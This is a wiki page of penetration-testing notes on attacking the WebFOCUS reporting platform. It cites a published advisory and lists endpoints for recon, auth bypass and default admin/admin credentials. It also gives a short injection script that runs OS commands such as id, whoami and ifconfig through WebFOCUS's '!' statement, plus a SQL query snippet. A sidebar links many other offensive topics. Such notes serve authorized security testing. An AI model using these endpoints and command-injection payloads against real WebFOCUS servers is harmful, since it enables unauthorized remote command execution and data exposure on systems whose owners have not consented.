forked from tjnull/TJ-JPT
-
Notifications
You must be signed in to change notification settings - Fork 7
WebFOCUS
TheGetch edited this page Jan 5, 2021
·
1 revision
WebFOCUS
WebFocus: http://infocenter.informationbuilders.com/wf81rel/index.jsp
From https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0315:
Code injection is achieved on the following URL: /ibi_apps/WFServlet
By successfully injecting WebFOCUS code on this URL parameter while properly completing the expected syntax, an attacker can leverage the "! " statement of WebFOCUS which allows for system commands to be executed via the reporting module code.
| URL | Result |
|---|---|
| /ibi_apps/bid | Access to the main interface - might bypass other auth restrictions |
| /ibi_apps | To test if WebFOCUS is available, default creds of admin/admin |
| /ibi_apps/ibi_html | TOC Report? |
| /ibi_help | Help page |
| /ibi_apps/rs?IBIRS_action=TEST | The RESTful Web Services Test Page |
| /ibi_apps/WFServlet?IBFS1_action=TEST | The RESTful Web Services Test Page |
| /ibi_apps/rs/ibfs?IBRS_action=privileges | Should list available privileges |
| /ibi_apps/rs?IBIRS_action=get&IBIRS_path=/WFC/Repository&IBIRS_service=ibfs | Should list some folders? |
| /ibi_apps/rs/ibfs/WFC/Repository?IBIRS_action=get | Same as above ? |
| /ibi_apps/rs/ibfs/EDA?IBIRS_action=get | This RESTful web service request can be used to list the Reporting Server nodes that are available to WebFOCUS. |
| /ibi_apps/rs/ibfs/EDA/NodeName?IBIRS_action=get | List the applications running on a node (Nodes can be found from the query above this) |
| /ibi_apps/rs/ibfs/EDA/NodeName/AppName?IBIRS_action=get | List the files within an application - relpace NodeName and AppName |
A minimum script needed. It throws errors but still executes Command Execution
-SYSTEM ps aux
!ps aux
!id
!whoami
!/sbin/ifconfig -a
-RUN
SQL
- SET &ECHO=ALL
SET SQLENGINE=SQLORA
ENGINE SQLORA
SELECT user FROM dual
END
-RUN
Documentation:
_Sidebar
1. Recon
- Ping Sweep: Windows Method
- Ping Sweep: Bash Method
- NetDiscover (ARP Scanning
- Nbtscan
- Ping Sweep: Python Method
- Ping Sweep: PowerShell Method
- Ping Sweep: Nmap method
- HTTP General Notes
- Cross-Site Scripting (XSS)
- SQL Injection (SQLi)
- Deserialization
- Directory Fuzzing
- IDOR Testing
- Intigriti Bug Bounty Tips
- Out of band exploitation
- Server-Side Template Injection (SSTI) Help
- Subdomain Enumeration
- WebFOCUS
- XXE Cheatsheet
- C2 Frameworks
- BloodHound
- Powershell Empire Quick Start Cheatsheet
- Pivoting/Tunneling
- Impacket
- Rubeus
- Mimikatz
- Identifying Hash Types
-
Dumping Hashes
-
- Cracking Hashes Offline
-
- Cracking Hashes Online
-
- Metasploit Meterpreter Migrate Process
- VMWare Port Forwarding
- Veil Simple Usage
- SSH: Generate OpenSSL RSA Key Pair from the Command Line
- Skipfish
- sed & awk: set root password in etc/shadow
- Search for ssh key quickly
- Python Proxy to Burp
- Python Convert .py to .exe
- PuttySCP Commands
- Powershell tidbits
- Password List - Generate quick list
- OS Enumeration - Ping
- Kerberos: Get KDC name and DNS name
- Impacket Scripts Error
- Gcc Compile Windows Executable in Linux
- Find Command: Filter out permission denied errors
- Excel Injection
- Digitally Sign Files (PowerShell Example)
- CSRF Tokens as Cookie Note
- Clear bash
- Burp Intruder Match/Replace
- Apache headers Test
- Windows Trial VMs
- Subdomain Brute Force
- Spawning TTY Shell
- Reserve Shell Cheat Sheet
- Pass-the-Hash
- Common Meterpreter Commands
- gcc & wine
- File Transfers
- Enable RDP - Windows
- DNS Reverse Lookup Brute Force
- Adding Users